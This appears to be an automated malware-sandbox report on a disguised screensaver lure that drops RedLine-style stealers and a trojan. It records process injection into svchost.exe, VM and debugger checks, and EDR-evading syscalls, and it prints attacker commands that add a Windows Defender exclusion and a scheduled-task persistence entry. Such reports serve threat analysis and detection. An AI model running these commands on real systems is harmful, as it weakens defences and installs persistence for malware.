Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Code function: 2_2_0044BD29 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,	2_2_0044BD29
Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Code function: 2_2_00475FE5 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	2_2_00475FE5
Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Code function: 2_2_0044BF8D _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,	2_2_0044BF8D

Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe

Code function: 0_2_0040E470 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_0040E470

Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Thread delayed: delay time: 599859	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Thread delayed: delay time: 599727	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Thread delayed: delay time: 599503	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Thread delayed: delay time: 599129	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Thread delayed: delay time: 599000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Thread delayed: delay time: 598876	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Thread delayed: delay time: 598750	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Thread delayed: delay time: 598640	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Thread delayed: delay time: 598531	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Thread delayed: delay time: 598421	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Thread delayed: delay time: 598312	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Thread delayed: delay time: 598190	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Thread delayed: delay time: 598062	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Thread delayed: delay time: 597953	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Thread delayed: delay time: 597830	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Thread delayed: delay time: 597703	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Thread delayed: delay time: 597562	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Thread delayed: delay time: 597375	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Thread delayed: delay time: 597225	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Thread delayed: delay time: 597044	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Thread delayed: delay time: 596937	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Thread delayed: delay time: 596576	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Thread delayed: delay time: 596250	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Thread delayed: delay time: 100000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Thread delayed: delay time: 99828	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Thread delayed: delay time: 99717	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Thread delayed: delay time: 99608	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Thread delayed: delay time: 99460	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Thread delayed: delay time: 99343	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Thread delayed: delay time: 99234	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Thread delayed: delay time: 99125	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Thread delayed: delay time: 99015	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Thread delayed: delay time: 98906	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Thread delayed: delay time: 98796	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Thread delayed: delay time: 98687	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Thread delayed: delay time: 98578	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Thread delayed: delay time: 98468	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Thread delayed: delay time: 98359	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Thread delayed: delay time: 98245	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Thread delayed: delay time: 98124	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Thread delayed: delay time: 97995	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Thread delayed: delay time: 97890	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Thread delayed: delay time: 97691	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Thread delayed: delay time: 97361	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Thread delayed: delay time: 97172	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Thread delayed: delay time: 97062	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Thread delayed: delay time: 96952	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Thread delayed: delay time: 96842	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Thread delayed: delay time: 96719	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Thread delayed: delay time: 96608	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Thread delayed: delay time: 96500	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Thread delayed: delay time: 96389	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Thread delayed: delay time: 96279	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Thread delayed: delay time: 96172	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Thread delayed: delay time: 96060	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Thread delayed: delay time: 95953	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Thread delayed: delay time: 95843	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\build.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\build.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Thread delayed: delay time: 60000
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Thread delayed: delay time: 60000
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\java.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaw.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaws.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\java.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaw.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaws.exe	Jump to behavior

Source: Spectrum.exe, 00000026.00000002.2955514791.0000000000673000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: fn_VMware
Source: build.exe, 0000000B.00000002.1944647135.0000000000A73000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll~g
Source: Native_Redline_BTC.exe, 00000005.00000002.1786360966.00000000008E1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe, 00000002.00000002.1754625306.0000000000928000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: microsofts.exe, 00000004.00000003.1816196442.00000000052C0000.00000004.00000020.00020000.00000000.sdmp, microsofts.exe, 00000004.00000003.1816024816.00000000052A7000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.2478943673.0000000000591000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.2652860040.0000000000591000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.2695381879.0000000000591000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.2458706033.0000000000591000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.2099434092.0000000000591000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.2616774980.0000000000591000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.2063437906.0000000000591000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.1983164372.0000000000591000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.1805271215.0000000000591000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Spectrum.exe, 00000026.00000002.2955514791.0000000000673000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: PAgSCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000X
Source: AppVClient.exe, 0000000A.00000003.1778472848.00000000004C7000.00000004.00000020.00020000.00000000.sdmp, AppVClient.exe, 0000000A.00000003.1778383567.00000000004C0000.00000004.00000020.00020000.00000000.sdmp, AppVClient.exe, 0000000A.00000002.1779210213.00000000004DE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: appv:SoftwareClients/appv:JavaVirtualMachine
Source: alg.exe, 00000006.00000003.2183000451.0000000000528000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.2767578204.0000000000528000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.2656006967.0000000000528000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.2827357031.0000000000528000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.2134781228.0000000000528000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.2098570638.0000000000528000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.2919770823.0000000000528000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.2262144345.0000000000528000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.2214400223.0000000000528000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.2229034246.0000000000528000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.2202750803.0000000000528000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Spectrum.exe, 00000026.00000002.2955514791.0000000000673000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: JNECVMWar VMware SATA CD00

Source: C:\Users\user\AppData\Local\Temp\microsofts.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\build.exe

Code function: 11_2_068E7F60 LdrInitializeThunk,

11_2_068E7F60

Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe

Code function: 0_2_0045A259 BlockInput,

0_2_0045A259

Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe

Code function: 0_2_0040D6D0 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,

0_2_0040D6D0

Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe

Code function: 0_2_0040EB70 LoadLibraryA,GetProcAddress,

0_2_0040EB70

Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Code function: 0_2_0567B358 mov eax, dword ptr fs:[00000030h]	0_2_0567B358
Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Code function: 0_2_0567C9F8 mov eax, dword ptr fs:[00000030h]	0_2_0567C9F8
Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Code function: 0_2_0567C998 mov eax, dword ptr fs:[00000030h]	0_2_0567C998
Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Code function: 2_2_056A02B8 mov eax, dword ptr fs:[00000030h]	2_2_056A02B8
Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Code function: 2_2_056A1958 mov eax, dword ptr fs:[00000030h]	2_2_056A1958
Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Code function: 2_2_056A18F8 mov eax, dword ptr fs:[00000030h]	2_2_056A18F8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_052C3F3D mov eax, dword ptr fs:[00000030h]	3_2_052C3F3D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_05281130 mov eax, dword ptr fs:[00000030h]	3_2_05281130

Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe

Code function: 0_2_00426DA1 CreateFileW,__lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,

0_2_00426DA1

Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process token adjusted: Debug
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Code function: 0_2_0042202E SetUnhandledExceptionFilter,	0_2_0042202E
Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Code function: 0_2_004230F5 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_004230F5
Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Code function: 0_2_00417D93 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00417D93
Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Code function: 0_2_00421FA7 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00421FA7
Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Code function: 2_2_0042202E SetUnhandledExceptionFilter,	2_2_0042202E
Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Code function: 2_2_004230F5 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_004230F5
Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Code function: 2_2_00417D93 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_00417D93
Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Code function: 2_2_00421FA7 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_00421FA7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_004015D7 SetUnhandledExceptionFilter,	3_2_004015D7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_004015D7 SetUnhandledExceptionFilter,	3_2_004015D7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_052C4C7B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_052C4C7B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_052C1361 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_052C1361

Source: C:\Users\user\AppData\Local\Temp\microsofts.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	NtOpenKeyEx: Indirect: 0x140077B9B
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	NtQueryValueKey: Indirect: 0x140077C9F
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	NtClose: Indirect: 0x140077E81

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe

Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe

Memory written: C:\Windows\SysWOW64\svchost.exe base: 301C008

Jump to behavior

Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe

Code function: 0_2_0043916A LogonUserW,

0_2_0043916A

Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe

0_2_0040D6D0

Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe

Code function: 0_2_004375B0 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,

0_2_004375B0

Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe

Code function: 0_2_00436431 __wcsicoll,mouse_event,__wcsicoll,mouse_event,

0_2_00436431

Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe"	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process created: C:\Users\user\AppData\Local\Temp\microsofts.exe "C:\Users\user\AppData\Local\Temp\microsofts.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process created: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe "C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe	Process created: C:\Users\user\AppData\Local\Temp\build.exe "C:\Users\user\AppData\Local\Temp\build.exe"
Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe	Process created: C:\Users\user\AppData\Local\Temp\server_BTC.exe "C:\Users\user\AppData\Local\Temp\server_BTC.exe"
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 12:46 /du 23:59 /sc daily /ri 1 /f
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process created: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe"
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpE6E4.tmp.cmd""
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 6

Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe

Code function: 0_2_00445DD3 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,

0_2_00445DD3

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 3_2_052A8550 GetVolumeInformationW,wsprintfW,GetLastError,GetLastError,GetUserNameW,GetLastError,GetLastError,GetUserNameW,LocalFree,AllocateAndInitializeSid,wsprintfW,SetEntriesInAclW,GetLastError,OpenMutexW,

3_2_052A8550

Source: RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Binary or memory string: Shell_TrayWnd
Source: RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe, 00000000.00000000.1679650804.0000000000482000.00000002.00000001.01000000.00000003.sdmp, RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe, 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: @3PDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning

Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe

Code function: 0_2_00410D10 cpuid

0_2_00410D10

Source: C:\Windows\SysWOW64\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe VolumeInformation
Source: C:\Windows\System32\alg.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\AppVClient.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\build.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\build.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\build.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\build.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
